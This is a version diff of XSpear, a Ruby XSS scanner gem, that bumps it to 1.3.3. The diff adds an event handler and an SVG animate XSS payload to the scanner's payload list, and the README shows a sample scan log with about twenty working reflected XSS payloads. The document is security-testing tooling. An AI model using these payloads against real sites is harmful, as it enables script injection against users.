XSpear 1.3.2 → 1.3.3

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: a5509ad9faf3e3689008c91b536685ecf6d381cacf3382ab93387273b3da5537
-  data.tar.gz: '09badc210487ad6720523817cd512c3757dcb898d33526e9fa8559807e376f21'
+  metadata.gz: afb284c2c76350733a45156127bde1e8fd996a6aabf985b3eef8a1b43e8147a7
+  data.tar.gz: f4411c5bdfb84d3ad32a87f34e1ffcd98a7ead48761b07134fcc82f5ded53f5b
 SHA512:
-  metadata.gz: 1b517090b2b2295599a4889e3fba362c84ef9bb048bf3f947e1b0c4661aa3f7d142c37b3156bcd74e57ecdcc76671a3c879f5f0a11bd5aef4cdc90f5ce1bb475
-  data.tar.gz: a39bcd1f637368502cc84deb85d5934f7979de5ed1cada889c9ee6b2ead14dcfc001f0475c6a4178d6e84f23d8052684d9cf668fbeb5fd4a82887efcec032cf5
+  metadata.gz: e031af8d10adfcdb511df45e0e9a34c19df1fdcbfc4bdcaf9179c584f25cf66df9d805204b85a8ef3c108495fa663c6e78dcc861549532d48556b867c9e5f65e
+  data.tar.gz: 9dcd8c46a718c459ab7d2b8ebc8a8e4e9181a51d7d0c1c4280219bd3502caa16ea48cbfeb6a3ca02a6fc21d226606801a704ba77824d89bcd07150c3833d3cd8

data/.idea/workspace.xml

@@ -3,7 +3,6 @@
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
       <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -30,8 +29,8 @@
         <entry file="file://$PROJECT_DIR$/README.md">
           <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
             <state split_layout="SPLIT">
-              <first_editor relative-caret-position="6525">
-                <caret line="435" column="38" selection-start-line="435" selection-start-column="38" selection-end-line="435" selection-end-column="38" />
+              <first_editor relative-caret-position="6840">
+                <caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
               </first_editor>
               <second_editor />
             </state>
@@ -47,11 +46,11 @@
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="230">
-              <caret line="651" column="13" lean-forward="true" selection-start-line="651" selection-start-column="13" selection-end-line="651" selection-end-column="13" />
+            <state relative-caret-position="316">
+              <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
             </state>
           </provider>
         </entry>
@@ -70,7 +69,7 @@
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
+      <file pinned="false" current-in-tab="true">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
           <provider selected="true" editor-type-id="text-editor">
             <state relative-caret-position="15">
@@ -163,7 +162,6 @@
       <foldersAlwaysOnTop value="true" />
     </navigator>
     <panes>
-      <pane id="Scope" />
       <pane id="ProjectPane">
         <subPane>
           <expand>
@@ -201,6 +199,7 @@
           <select />
         </subPane>
       </pane>
+      <pane id="Scope" />
     </panes>
   </component>
   <component name="PropertiesComponent">
@@ -266,35 +265,8 @@
       <workItem from="1574090247432" duration="1799000" />
       <workItem from="1577115206395" duration="21990000" />
       <workItem from="1580314696983" duration="286000" />
-      <workItem from="1580583824837" duration="966000" />
-    </task>
-    <task id="LOCAL-00026" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
-      <created>1563649920055</created>
-      <option name="number" value="00026" />
-      <option name="presentableId" value="LOCAL-00026" />
-      <option name="project" value="LOCAL" />
-      <updated>1563649920055</updated>
-    </task>
-    <task id="LOCAL-00027" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
-      <created>1563649975625</created>
-      <option name="number" value="00027" />
-      <option name="presentableId" value="LOCAL-00027" />
-      <option name="project" value="LOCAL" />
-      <updated>1563649975625</updated>
-    </task>
-    <task id="LOCAL-00028" summary="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;">
-      <created>1563813695850</created>
-      <option name="number" value="00028" />
-      <option name="presentableId" value="LOCAL-00028" />
-      <option name="project" value="LOCAL" />
-      <updated>1563813695850</updated>
-    </task>
-    <task id="LOCAL-00029" summary="(1.0.5) Update README.md">
-      <created>1563814201784</created>
-      <option name="number" value="00029" />
-      <option name="presentableId" value="LOCAL-00029" />
-      <option name="project" value="LOCAL" />
-      <updated>1563814201784</updated>
+      <workItem from="1580583824837" duration="1470000" />
+      <workItem from="1581089876742" duration="268000" />
     </task>
     <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
       <created>1563893769120</created>
@@ -611,11 +583,39 @@
       <option name="project" value="LOCAL" />
       <updated>1577632578176</updated>
     </task>
-    <option name="localTasksCounter" value="75" />
+    <task id="LOCAL-00075" summary="(Fixed #45 , #47) ruby 2.7.0 troubleshooting(URI)">
+      <created>1580585220585</created>
+      <option name="number" value="00075" />
+      <option name="presentableId" value="LOCAL-00075" />
+      <option name="project" value="LOCAL" />
+      <updated>1580585220586</updated>
+    </task>
+    <task id="LOCAL-00076" summary="Released 1.3.2">
+      <created>1580585376006</created>
+      <option name="number" value="00076" />
+      <option name="presentableId" value="LOCAL-00076" />
+      <option name="project" value="LOCAL" />
+      <updated>1580585376006</updated>
+    </task>
+    <task id="LOCAL-00077" summary="(Fixed #49) Add onpointerrawupdate event handler for xss">
+      <created>1581089940822</created>
+      <option name="number" value="00077" />
+      <option name="presentableId" value="LOCAL-00077" />
+      <option name="project" value="LOCAL" />
+      <updated>1581089940823</updated>
+    </task>
+    <task id="LOCAL-00078" summary="(Fixed #50) Add SVG Animate XSS Payload">
+      <created>1581090128596</created>
+      <option name="number" value="00078" />
+      <option name="presentableId" value="LOCAL-00078" />
+      <option name="project" value="LOCAL" />
+      <updated>1581090128596</updated>
+    </task>
+    <option name="localTasksCounter" value="79" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="75285000" />
+    <option name="totallyTimeSpent" value="76057000" />
   </component>
   <component name="TodoView">
     <todo-panel id="selected-file">
@@ -630,7 +630,7 @@
     <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
     <editor active="true" />
     <layout>
-      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13578275" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.1368477" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -656,10 +656,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="(1.1.0) [Fixed #14] Edit raw query print code" />
-    <MESSAGE value="(1.1.0) [Fixed #15] makeQueryPattern 내 페이로드 생성 코드 수정" />
-    <MESSAGE value="(1.1.0) Releases 1.1.0 / Fixed bug, modify report format, etc.." />
-    <MESSAGE value="(1.1.1) Add WAF Found module frame..(TO_DO)" />
     <MESSAGE value="(1.1.1) Add code level function &amp; Check WAF code frame" />
     <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
     <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
@@ -681,7 +677,11 @@
     <MESSAGE value="(1.3) Released 1.3.0 +_+" />
     <MESSAGE value="(1.3) Fixed dependency bug" />
     <MESSAGE value="XSpear on Burpsuite" />
-    <option name="LAST_COMMIT_MESSAGE" value="XSpear on Burpsuite" />
+    <MESSAGE value="(Fixed #45 , #47) ruby 2.7.0 troubleshooting(URI)" />
+    <MESSAGE value="Released 1.3.2" />
+    <MESSAGE value="(Fixed #49) Add onpointerrawupdate event handler for xss" />
+    <MESSAGE value="(Fixed #50) Add SVG Animate XSS Payload" />
+    <option name="LAST_COMMIT_MESSAGE" value="(Fixed #50) Add SVG Animate XSS Payload" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -751,8 +751,8 @@
     <entry file="file://$PROJECT_DIR$/README.md">
       <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
         <state split_layout="SPLIT">
-          <first_editor relative-caret-position="6525">
-            <caret line="435" column="38" selection-start-line="435" selection-start-column="38" selection-end-line="435" selection-end-column="38" />
+          <first_editor relative-caret-position="6840">
+            <caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
           </first_editor>
           <second_editor />
         </state>
@@ -799,17 +799,17 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="15">
-          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+        <state relative-caret-position="316">
+          <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="230">
-          <caret line="651" column="13" lean-forward="true" selection-start-line="651" selection-start-column="13" selection-end-line="651" selection-end-column="13" />
+        <state relative-caret-position="15">
+          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
         </state>
       </provider>
     </entry>

data/README.md

@@ -3,7 +3,28 @@
 # XSpear
 XSpear is XSS Scanner on ruby gems
 
-<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/dt/XSpear.svg"> <img src="https://img.shields.io/github/license/hahwul/XSpear.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/static/v1.svg?label=follow&message=hahwul&color=black"></a>
+<img src="https://img.shields.io/github/languages/top/hahwul/xspear?color=red"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/dt/XSpear.svg"> <img src="https://img.shields.io/librariesio/sourcerank/rubygems/Xspear"> <img src="https://img.shields.io/github/license/hahwul/XSpear.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/twitter/follow/hahwul?style=flat-square"></a>
+
+## TOC
+- [XSpear](#xspear)
+  * [Key features](#key-features)
+  * [Installation](#installation)
+    + [Dependency gems](#dependency-gems)
+  * [Usage on cli](#usage-on-cli)
+    + [Result types](#result-types)
+    + [Verbose Mode](#verbose-mode)
+    + [Case by Case](#case-by-case)
+    + [Sample log](#sample-log)
+  * [Usage on ruby code](#usage-on-ruby-code)
+  * [Add Scanning Module](#add-scanning-module)
+  * [Update](#update)
+  * [Development](#development)
+  * [Contributing](#contributing)
+  * [Donate](#donate)
+  * [License](#license)
+  * [Code of Conduct](#code-of-conduct)
+  * [ScreenShot](#screenshot)
+  * [Video](#video)
 
 ## Key features
 - Pattern matching based XSS scanning
@@ -53,7 +74,7 @@ And then execute:
     $ bundle
 
 ### Dependency gems
-`colorize` `selenium-webdriver` `terminal-table`<br>
+`colorize` `selenium-webdriver` `terminal-table` `progress_bar`<br>
 If you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.
 
 ```
@@ -394,7 +415,7 @@ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff
 {"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
 ```
 
-## Usage on ruby code (gem library)
+## Usage on ruby code
 ```ruby
 require 'XSPear'
 
@@ -479,6 +500,9 @@ if develpers (hard)
 $ git reset --hard HEAD; git pull -v
 ```
 
+## RubyDoc
+https://www.rubydoc.info/gems/XSpear/
+
 ## Development
 
 After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.

data/lib/XSpear/version.rb

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.3.2"
+  VERSION = "1.3.3"
 end

data/lib/XSpear.rb

@@ -392,7 +392,8 @@ class XspearScan
         'onvolumechange',
         'onwaiting',
         'onwheel',
-        'whatthe=""onload'
+        'whatthe=""onload',
+        'onpointerrawupdate'
     ]
     tags = [
         "script",
@@ -536,6 +537,7 @@ class XspearScan
     r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
     r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
     r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+    r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
 
 
     onfocus_tags.each do |t|

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.3.2
+  version: 1.3.3
 platform: ruby
 authors:
 - hahwul
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2020-02-01 00:00:00.000000000 Z
+date: 2020-02-07 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -186,7 +186,7 @@ files:
 - LICENSE.txt
 - README.md
 - Rakefile
-- XSpear-1.3.1.gem
+- XSpear-1.3.2.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup